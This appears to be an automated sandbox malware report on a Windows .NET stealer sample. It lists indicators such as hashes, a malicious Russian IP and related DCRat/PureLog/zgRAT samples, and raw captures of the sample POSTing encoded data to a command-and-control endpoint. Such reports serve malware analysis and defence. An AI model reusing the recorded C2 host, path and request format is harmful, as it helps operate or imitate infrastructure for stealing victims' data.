http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	fDTPlvsGfH.exe, 00000000.00000002.1670534980.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1810438460.000001BD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1855541530.0000028356711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1876718568.000001DC294F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1814710733.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1975526047.000001DB19131000.00000004.00000800.00020000.00000000.sdmp, nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1975526047.000001DB19358000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	powershell.exe, 00000001.00000002.2656640543.000001BDF7D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2654509364.000002836EA10000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.107.182.145	unknown	Russian Federation		49973	TELEPORT-TV-ASRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428989
Start date and time:	2024-04-20 00:41:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	fDTPlvsGfH.exe renamed because original name is a hash value
Original Sample Name:	B8298EE526BB093E3C96686D26D1361F.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@27/397@0/2
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 184.31.62.93
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1836 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1856 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6044 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7152 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7160 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: fDTPlvsGfH.exe

Simulations

Behavior and APIs

Time	Type	Description
00:41:59	API Interceptor	155x Sleep call for process: powershell.exe modified
00:42:09	API Interceptor	214146x Sleep call for process: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe modified
00:42:12	API Interceptor	2x Sleep call for process: svchost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEPORT-TV-ASRU	eOU2MVDmTd.exe	Get hash	malicious	CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT	Browse	109.107.181.83
	SecuriteInfo.com.Win64.PWSX-gen.6289.18727.exe	Get hash	malicious	CredGrabber, Meduza Stealer, PureLog Stealer	Browse	109.107.181.83
	gKN4xIjj5o.exe	Get hash	malicious	CredGrabber, PureLog Stealer	Browse	109.107.181.83
	vRp56pf5a9.exe	Get hash	malicious	CredGrabber, PureLog Stealer, zgRAT	Browse	109.107.181.83
	crsa4bZhdH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	109.107.182.28
	IS48Ri2TQl.exe	Get hash	malicious	CredGrabber, Meduza Stealer, PureLog Stealer	Browse	109.107.181.83
	responsibilitylead.exe	Get hash	malicious	CredGrabber, PureLog Stealer	Browse	109.107.181.83
	HPK865zJIX.exe	Get hash	malicious	Xmrig	Browse	109.107.161.51
	KmnUuAaoo8.exe	Get hash	malicious	Xmrig	Browse	109.107.161.51
	2nd_stage_payload.ps1	Get hash	malicious	Unknown	Browse	109.107.173.60

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\AHvxDOtC.log	W4tW72sfAD.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	8CDSiIApNr.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3otr19d5Oq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	idYLOQOVSi.exe	Get hash	malicious	DCRat	Browse
	ZAF4Dsu737.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	mbsPX9l9Ge.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	nxs4if1qOO.exe	Get hash	malicious	DCRat	Browse
	crsa4bZhdH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	C9EBSy2FG0.exe	Get hash	malicious	DCRat	Browse
	y3HHIzAW6R.exe	Get hash	malicious	DCRat	Browse
C:\Users\user\Desktop\AZWFwAgV.log	8CDSiIApNr.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3otr19d5Oq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ZAF4Dsu737.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	nxs4if1qOO.exe	Get hash	malicious	DCRat	Browse
	crsa4bZhdH.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	C9EBSy2FG0.exe	Get hash	malicious	DCRat	Browse
	mE6cY5Lf5f.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	2qCi8YfXXc.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	fLxh5LPKeO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	1tQ7HC6GOS.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Process:	C:\Users\user\Desktop\fDTPlvsGfH.exe
File Type:	ASCII text, with very long lines (815), with no line terminators
Category:	dropped
Size (bytes):	815
Entropy (8bit):	5.886238430982932
Encrypted:	false
SSDEEP:	24:yB25S/imDEVRCgJcWcL1gTzlPd9L0nWLr+If58Ld:yB25KimDEVpJtcST9dh0n8+A+d
MD5:	E57837F298451AEC10876D2E19F44393
SHA1:	BA0CBF590DCF4F79BF16E2B5C9B90FE155E9CCBD
SHA-256:	7A049395A489C44EA1C55DAA6442D84059DAA236064B18DA03313371F9AE7B2E
SHA-512:	D92FD9EF7CC1A5172D249CC508BC46DB52E934A6FC0A8BDA527416EE0B364407F0F1314D76322EE8B80E23B57592DB32CD422AF2A70E4D2539EEA4E6E182C521
Malicious:	false
Preview:	hA8nDHdVOlfr4yRVPKQJpNxpZ0Ry82UPTlMQ7PHLZTUXqTNowlFhquJTNSNMzpWVQPYTlAY9DFuV2a9GnnBXxxijc2DpC5Vu69Ga44CwNFdkAxbwTGjMo9hcrz1t6s7Hu9Z3TiMslOJsT7ipbQW6VJG6botFDTzeHV0AXhdu40kZzzItQLRqWBwk3cbpzGpRYpk7HhR3wlBeiqHmfAz1BJHGjPH5Gy5xLTAKPKls4Y3v9RCMVzJzRxPPhdY1aWw8qNSPq7WUYG7nQWHRN4kRpFgYDvmvwuSil4Ev9xgYcybK0m8LWGofwfTkr4L4UkinyYCVRVSaXMz0oWhbxbZpFwwFleEElmD1QxWbjm3AyNHkqc5VXuH3L3iBm6uxRNzvI7k19F1KiY02oMZJitr0eKqXPVzn2FtlYWbs2EVR36VwCqWagkPhf8R8RNmoQNScpPdSurRdXa7hy4Uj8YGR0LFaEdbocrApo2GxMDqzTvKFBtJW2Dp1GAldKDNRPmBqZR35xhW4sR8FB9YVTEwZBIjoQmnJzYkqtequ0NjVqvJzCgcKo28L0moQsOoK4NEUrRVgToeFeasQ9tmuKce7aY0G0ZCliYbdqzIuK51AX2qZ3XR8m4AbsH3SaOq4l3gG9PkJk1jOlejhsbNdHD9oY9uj50U6P7YeWkZowHYvVw0OiWj9BNwi32rAeBOthn9oFELIBiqApNSmJgBjRU4BK0ld2ZKv3oOsxLIdKa7dhv3pjF07ApcMs7dPdrQmY4HA9kz7YhY0WaeY654wiMvOLB9zs2AdKVEmo2q8Q3jcQmzRcES

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x8044a80e, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221505535223442
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
MD5:	528B7A888F13FE71D9AB3CE00CFE062F
SHA1:	EF73E1A6D985D04AF8E9C3453D50AD4832673046
SHA-256:	611DC5B654E7264A6E37268E18096A863ABC7F0EC7F47278DFF8D441161F1451
SHA-512:	931BBECE9C66D14686B477C1A08C54A6503D72191228AFDA716A7508920D6121E2F7A0C373E774565061575B57766EDDEAEF700EBC64CEFAFA1610DCFAD424BE
Malicious:	false
Preview:	.D..... .......A.......X\...;...{......................0.!..........{A.....\|9.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................G.....\|9..................(...*...\|9..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllul3nqth:NllUa
MD5:	851531B4FD612B0BC7891B3F401A478F
SHA1:	483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
SHA-256:	383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
SHA-512:	A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
Malicious:	false
Preview:	@...e.................................&..............@..........

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.7111552889581025
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXORMp9XnfHvpqGKvj:Vx993DEUUpRq
MD5:	ACD3E6B0B8D5CF1F9528160FE2470960
SHA1:	2E6052AB4B2DB0E0CFA7F82C3EBBEB16B19A4076
SHA-256:	CC9A5D328460C123C5DB1E0B01B569D6CD2A4B626A096C313B5A4445A718125E
SHA-512:	DE0C238FA86985C3EA0DFBBE178872FF3C68BB6B3AA283F67B6EA37367038ECE57CF8762F331E412757445944A7814CF7A6DE0D22076145230C7BB5E23E9FD49
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 20/04/2024 02:27:23..02:27:23, error: 0x80072746.02:27:28, error: 0x80072746.

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.630553832081319
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	fDTPlvsGfH.exe
File size:	2'669'568 bytes
MD5:	b8298ee526bb093e3c96686d26d1361f
SHA1:	583ff162c74e864d77323b76355f175aab170e1f
SHA256:	08d8919249b3f442106283b5a413eaff6b6b3d9ca76ec7c3a88101b54bab0fe4
SHA512:	34211f5274fb5791b25fd16b352c5b56305e1d067df8f3974ff0d2d0f03f976e083451d725afbb07a9533886953b9c58c6b9a41ccfa884b1e4604756c03fbf5a
SSDEEP:	24576:jKzVgGWEP/Cw7sULqPyZwSxIshFQb8mu0c3jlCjH5xdL9UvGigW261+:ezVhP5lwSxXAlpW
TLSH:	44C57D343DEB102AB173EFA58AE4749ADA6FF6B33B07585E205103864713A81DDD163E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).......)...@................................

Entrypoint:	0x68d3ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28d37c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28e000	0x370	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x290000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x28b3d4	0x28b400	ef20a52dcb3e1d31870afa995ed1fdfc	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x28e000	0x370	0x400	2ffb75f85312317934221c41dbe5a9af	False	0.37890625	data	2.865400005536527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x290000	0xc	0x200	bccc878290eb21ce22166d068a97c9a1	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:09.487447977 CEST	258	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Apr 20, 2024 00:42:09.746531963 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:09.747986078 CEST	344	OUT	Data Raw: 00 06 04 01 06 01 04 07 05 06 02 01 02 01 01 03 00 0b 05 09 02 0c 03 09 07 0f 0d 01 03 07 01 52 0d 51 04 0e 03 01 03 07 0c 06 05 03 07 01 06 06 03 03 0f 59 0f 04 05 07 06 07 06 06 05 05 00 0f 03 53 0f 00 07 03 01 07 0b 0f 0c 54 0f 0d 0d 04 05 0d Data Ascii: RQYSTTR\L}ThNvOva}BvKZ\|itlhptDxB^ZzpP\|}QRtc^~e~V@x}PNru
Apr 20, 2024 00:42:10.218797922 CEST	292	IN	Data Raw: 01 41 5b 7d 6e 5e 50 62 06 57 69 0a 0c 08 52 5d 60 4a 5d 60 07 58 57 61 6d 59 7c 5d 72 65 54 5e 55 04 6c 64 68 52 63 0a 60 59 53 71 63 4b 7c 5e 40 5f 68 06 6f 45 55 74 4d 02 69 04 5a 42 60 07 7b 46 51 56 64 42 50 5e 67 4d 56 70 7a 4f 62 7f 6c 5f Data Ascii: A[}n^PbWiR]`J]`XWamY\|]reT^UldhRc`YSqcK\|^@_hoEUtMiZB`{FQVdBP^gMVpzObl_zQ{~hg~J}XP\QqEQbWAZ[YZXbUSZax`aYq[VQeUL]^R``_UUZXlgz@{T]U[{ETaSHQUKlaeFT~f\hgx{Rt\|^p~gf]yzx]laFS}d]Rd^SsMnUTag]p]_QxaWtXdE}f\|^\|qrVcaDP~f[S
Apr 20, 2024 00:42:10.218857050 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Apr 20, 2024 00:42:10.218895912 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 36 63 0d 0a 56 4a 7d 59 78 53 55 03 7b 61 68 02 7c 72 7f 01 7c 77 6c 54 6b 60 57 08 7a 60 7c 05 69 62 56 02 77 4d 61 42 7a 4f 79 4a 76 66 59 5b 7c 71 78 01 55 4b 72 50 63 5b 68 58 6b 5c 75 05 68 64 75 51 78 75 74 09 7d 5a 78 59 76 5b 72 5e 74 61 7d 00 7f 4f 58 00 6a 6c 7f 55 7f 77 7f 44 75 4c 7b 06 7c 5c 6d 49 7e 73 72 5e 6f 5e 6c 04 6f 01 68 01 78 6d 7f 49 79 5b 73 59 7b 63 5b 5a 7d 60 60 49 7b 74 60 44 7e 62 7f 07 62 62 67 59 7a 51 41 5b 7d 74 7f 55 68 71 50 52 75 52 5d 5b 78 52 7c 02 74 4e 7a 43 7b 71 65 04 69 55 66 02 78 61 65 5b 75 4d 63 01 61 5f 5e 41 76 61 7a 50 7e 5d 7a 06 77 61 7d 01 76 66 6f 50 7f 42 65 01 77 6f 60 04 68 63 6c 00 78 6c 51 03 7b 06 76 02 6b 6d 63 51 74 77 6c 07 69 61 7d 50 7e 6e 78 54 6f 54 66 4f 7e 5b 7a 5b 7b 5d 46 51 6b 0a 70 41 69 60 70 0c 6a 67 6e 05 6f 7e 7b 02 78 61 6b 5b 7f 61 55 00 6a 67 67 4f 68 06 79 40 7a 70 7f 5f 6a 5b 7c 48 76 70 75 51 7b 5c 79 06 75 76 68 00 7e 58 64 02 7e 76 5f 4f 76 72 55 44 7f 4c 7d 42 7c 77 7a 0c 7b 48 70 41 7e 73 7f 47 76 72 69 4c 77 71 69 4a 7c 5f 54 46 7d 6c 78 08 7d 67 59 06 75 5f 6b 49 78 5c 79 03 7c 70 6d 03 78 59 60 01 7b 67 5a 4f 7b 43 55 49 7a 4c 6c 02 78 63 50 4f 7f 5e 5a 01 78 77 56 02 7e 62 55 03 75 5f 52 47 7e 6c 55 07 7d 67 68 0b 7c 71 79 08 75 42 6c 05 7a 7c 64 05 77 70 54 40 7a 4f 6d 00 7e 42 58 41 7b 71 7a 48 75 73 63 02 75 61 74 07 76 71 7a 41 7e 70 76 04 74 5c 7d 04 76 65 7c 0b 7e 6c 7d 06 74 42 7c 4c 7e 63 78 01 7b 7c 55 07 78 70 7e 4a 7f 6d 78 0d 77 59 74 03 7e 62 6e 42 7e 43 5d 09 78 53 76 04 7e 72 61 03 7d 70 64 0b 7f 7c 68 0c 7f 70 5a 0d 7d 59 66 06 7a 6d 59 44 7b 62 68 01 7f 5f 67 06 7c 77 55 0c 7f 60 75 0d 79 73 74 42 7e 5c 78 03 74 5d 57 08 7a 61 5b 03 76 48 60 4a 7e 66 7c 07 7e 66 5b 0b 77 5c 51 03 7c 72 65 4c 7c 67 50 0c 79 66 60 4f 7e 5d 63 04 75 62 5f 4f 74 5f 71 47 7f 5f 66 00 7e 6c 70 43 7d 67 73 06 75 5f 6b 00 7b 62 5f 04 7d 5e 5b 03 79 67 78 4c 78 49 70 06 78 53 77 4b 78 72 70 05 78 73 6e 4e 7b 5d 4e 5a 6f 59 78 06 6a 62 7b 02 62 71 6c 01 7e 42 7b 02 7c 67 52 40 68 5f 65 09 61 6f 73 5a 7b 0a 64 49 63 73 6e 43 79 61 65 4a 69 7f 62 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 59 6a 40 63 5c 7a 5c 76 4b 70 41 7f 0a 7a 58 63 7c 70 4f 68 05 70 01 79 6c 67 4a 7b 60 66 00 6b 53 70 0d 76 77 7c 05 7d 62 50 0d 7a 53 59 51 66 6e 06 5e 6a 04 66 44 53 63 04 54 61 55 7f 0b 69 6c 7f 52 50 5e 5b 43 51 7e 78 5b 55 04 67 76 53 72 0b 00 69 6b 7c 08 52 59 76 55 6e 5a 55 5f 69 04 67 44 70 5e 47 51 6e 61 76 5f 62 76 63 5f 7d 5f 78 06 7f 76 76 52 74 62 56 59 7f 61 65 01 7c 74 7e 4e 79 66 6f 53 69 5d 67 00 76 71 6a 5e 63 71 6d 59 7e 5b 40 58 6a 0a 63 4f 53 74 4a 02 62 07 5e 45 6d 05 72 5c 50 6c 6e 5f 55 00 68 5d 79 5a 70 01 7b 6a 06 49 78 72 70 44 7b 63 54 43 7c 60 70 5a 7a 70 7f 5d 69 61 0f 40 5a 7d 63 5e 52 6f 03 54 6b 01 5d 08 57 66 7d 0f 71 53 08 5e 56 55 5d 5d 5d 7c 65 51 7d 5c 43 59 69 0a 65 40 56 72 4b 00 62 05 5a 46 60 06 7f 5a 63 07 5b 4f 53 5d 7a 01 70 5d 5c 59 5a 02 73 56 50 6f 75 5c 75 7b 73 5b 6b 60 00 44 54 70 60 5c 54 63 06 55 51 54 6f 57 58 64 00 43 61 04 0e 53 69 6a 7f 0e 7c 52 53 74 79 5f 47 5e 68 06 67 4e 51 7f 41 08 6a 06 5d 4d 6b 00 7d 58 6f 0b 5e 45 54 5d 04 59 53 62 67 5a 7c 5a 7c 70 6b 63 09 41 6e 05 55 5d 79 5f 42 58 63 05 66 4e 57 72 48 02 62 00 5d 47 6b 00 7f 41 54 65 0d 08 5a 58 5e 77 50 04 62 59 7b 59 5c 50 60 64 74 51 7f 74 78 5e 62 61 Data Ascii: 56cVJ}YxSU{ah\|r\|wlTk`Wz`\|ibVwMaBzOyJvfY[\|qxUKrPc[hXk\uhduQxut}ZxYv[r^ta}OXjlUwDuL{\|\mI~sr^o^lohxmIy[sY{c[Z}``I{t`D~bbbgYzQA[}tUhqPRuR][xR\|tNzC{qeiUfxae[uMca_^AvazP~]zwa}vfoPBewo`hclxlQ{vkmcQtwlia}P~nxToTfO~[z[{]FQkpAi`pjgno~{xak[aUjggOhy@zp_j[\|HvpuQ{\yuvh~Xd~v_OvrUDL}B\|wz{HpA~sGvriLwqiJ\|_TF}lx}gYu_kIx\y\|pmxY`{gZO{CUIzLlxcPO^ZxwV~bUu_RG~lU}gh\|qyuBlz\|dwpT@zOm~BXA{qzHuscuatvqzA~pvt\}ve\|~l}tB\|L~cx{\|Uxp~JmxwYt~bnB~C]xSv~ra}pd\|hpZ}YfzmYD{bh_g\|wU`uystB~\xt]Wza[vH`J~f\|~f[w\Q\|reL\|gPyf`O~]cub_Ot_qG_f~lpC}gsu_k{b_}^[ygxLxIpxSwKxrpxsnN{]NZoYxjb{bql~B{\|gR@h_eaosZ{dIcsnCyaeJib_z\y\}b`g{ZL~JxYj@c\z\vKpAzXc\|pOhpylgJ{`fkSpvw\|}bPzSYQfn^jfDScTaUilRP^[CQ~x[UgvSrik\|RYvUnZU_igDp^GQnav_bvc_}_xvvRtbVYae\|t~NyfoSi]gvqj^cqmY~[@XjcOStJb^Emr\Pln_Uh]yZp{jIxrpD{cTC\|`pZzp]ia@Z}c^RoTk]Wf}qS^VU]]]\|eQ}\CYie@VrKbZF`Zc[OS]zp]\YZsVPou\u{s[k`DTp`\TcUQToWXdCaSij\|RSty_G^hgNQAj]Mk}Xo^ET]YSbgZ\|Z\|pkcAnU]y_BXcfNWrHb]GkATeZX^wPbY{Y\P`dtQtx^ba
Apr 20, 2024 00:42:10.469775915 CEST	234	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 384 Expect: 100-continue
Apr 20, 2024 00:42:10.728586912 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:10.728864908 CEST	384	OUT	Data Raw: 5f 5a 5b 5f 54 5d 58 57 5d 56 5a 59 52 51 56 54 54 56 5c 5c 50 50 53 5e 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: _Z[_T]XW]VZYRQVTTV\\PPS^W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R'$= 9R$%8? 7+:6&7!&Q*,,Z 'R,$.G#$Z-
Apr 20, 2024 00:42:10.994282007 CEST	349	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Apr 2024 22:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1a 24 5b 3e 5c 25 0b 37 1c 3b 01 3b 2f 33 0a 29 21 0c 59 39 31 29 5b 2a 3f 0a 12 2b 3e 00 0a 3e 20 24 5b 33 32 33 07 24 2f 26 55 2c 2a 20 5a 01 11 27 40 30 29 34 1c 27 23 0b 02 26 30 03 06 32 03 26 1b 33 16 36 1e 3e 3c 29 54 30 2b 38 5a 29 01 2a 55 3f 3f 33 0a 27 2c 20 0c 36 1e 20 50 0c 10 38 51 3e 32 3f 52 31 02 3b 55 31 06 35 1e 23 10 28 51 26 01 0d 53 21 34 3f 14 3c 32 3d 06 28 2e 3f 02 23 22 2c 58 33 22 3f 0a 28 08 22 5e 2c 0f 20 54 02 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98$[>\%7;;/3)!Y91)[?+>> $[323$/&U, Z'@0)4'#&02&36><)T0+8Z)*U??3', 6 P8Q>2?R1;U15#(Q&S!4?<2=(.?#",X3"?("^, T=ZP0

Timestamp	Bytes transferred	Direction	Data
Apr 20, 2024 00:42:10.810338020 CEST	235	OUT	POST /ExternalVm_CpuGameWindows.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 109.107.182.145 Content-Length: 2564 Expect: 100-continue
Apr 20, 2024 00:42:11.072000027 CEST	25	IN	HTTP/1.1 100 Continue
Apr 20, 2024 00:42:11.575651884 CEST	2564	OUT	Data Raw: 5a 51 5e 5a 54 57 58 57 5d 56 5a 59 52 58 56 5a 54 57 5c 5e 50 55 53 5c 57 5e 5e 5d 52 5b 5b 5b 42 52 57 5e 5f 57 5a 5b 59 5d 50 5c 50 5c 5f 5a 57 5d 58 40 59 58 56 51 59 52 50 53 5a 51 58 5c 5e 58 5c 59 5c 5d 50 51 46 59 43 56 59 59 42 5c 51 5d Data Ascii: ZQ^ZTWXW]VZYRXVZTW\^PUS\W^^]R[[[BRW^_WZ[Y]P\P\_ZW]X@YXVQYRPSZQX\^X\Y\]PQFYCVYYB\Q]QVSZYA^[\RYQ_RZ[BVQT\VX\Y]X^_R]]_R[Z\WZE\XSW]^U[VS_PZQZW^VUI]\VV\[W]YXZBB___S\BXFY^Y^ZU\Z_X_ZZ\\XVBU^R$0?& 9'3?%(+]7;V(\8"!U"".T)?,7?$..G#$Z-
